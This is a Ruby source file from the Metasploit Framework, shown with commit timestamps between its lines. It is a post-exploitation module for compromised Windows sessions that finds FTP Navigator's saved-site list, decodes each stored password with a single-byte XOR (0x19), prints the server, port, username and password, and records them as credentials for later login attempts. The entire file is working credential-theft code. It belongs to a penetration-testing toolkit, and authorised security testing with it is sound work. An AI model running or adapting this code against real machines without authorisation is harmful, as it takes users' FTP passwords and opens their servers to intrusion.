metasploit-framework/modules/post/windows/gather/credentials/ftpnavigator.rb

112 lines
3.0 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
2012-10-23 18:24:05 +00:00
require 'msf/core/auxiliary/report'
class Metasploit3 < Msf::Post
2013-08-30 21:28:54 +00:00
include Msf::Post::Windows::Registry
include Msf::Auxiliary::Report
2013-08-30 21:28:54 +00:00
def initialize(info={})
super(update_info(info,
'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',
'Description' => %q{
This module extracts saved passwords from the FTP Navigator FTP client.
It will decode the saved passwords and store them in the database.
},
'License' => MSF_LICENSE,
'Author' => ['theLightCosine'],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
2013-08-30 21:28:54 +00:00
def run
key = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\FTP Navigator_is1\\"
val_name = "InstallLocation"
installdir = registry_getvaldata(key, val_name) || "c:\\FTP Navigator\\"
2013-08-30 21:28:54 +00:00
path = "#{installdir}Ftplist.txt"
2013-08-30 21:28:54 +00:00
begin
ftplist = client.fs.file.new(path,'r')
rescue Rex::Post::Meterpreter::RequestError => e
print_error("Unable to open Ftplist.txt: #{e}")
print_error("FTP Navigator May not Ne Installed")
return
end
2013-08-30 21:28:54 +00:00
lines = ftplist.read.split("\n")
lines.each do |line|
next if line.include? "Anonymous=1"
next unless line.include? ";Password="
2013-08-30 21:28:54 +00:00
dpass = ""
username = ""
server = ""
port = ""
2013-08-30 21:28:54 +00:00
line.split(";").each do |field|
next if field.include? "SavePassword"
2013-08-30 21:28:54 +00:00
if field.include? "Password="
epass = split_values(field)
dpass = decode_pass(epass)
elsif field.include? "User="
username = split_values(field)
elsif field.include? "Server="
server = split_values(field)
elsif field.include? "Port="
port = split_values(field)
end
end
2013-08-30 21:28:54 +00:00
print_good("Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}")
2014-06-11 17:57:45 +00:00
service_data = {
address: Rex::Socket.getaddress(server),
port: port,
protocol: "tcp",
service_name: "ftp",
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :session,
session_id: session_db_id,
post_reference_name: self.refname,
username: username,
private_data: dpass,
private_type: :password
}
credential_core = create_credential(credential_data.merge(service_data))
login_data = {
core: credential_core,
access_level: "User",
status: Metasploit::Credential::Login::Status::UNTRIED
}
create_credential_login(login_data.merge(service_data))
2013-08-30 21:28:54 +00:00
end
end
2013-08-30 21:28:54 +00:00
def split_values(field)
values = field.split("=",2)
return values[1]
end
2013-08-30 21:28:54 +00:00
def decode_pass(encoded)
decoded = ""
encoded.unpack("C*").each do |achar|
decoded << (achar ^ 0x19)
end
return decoded
end
end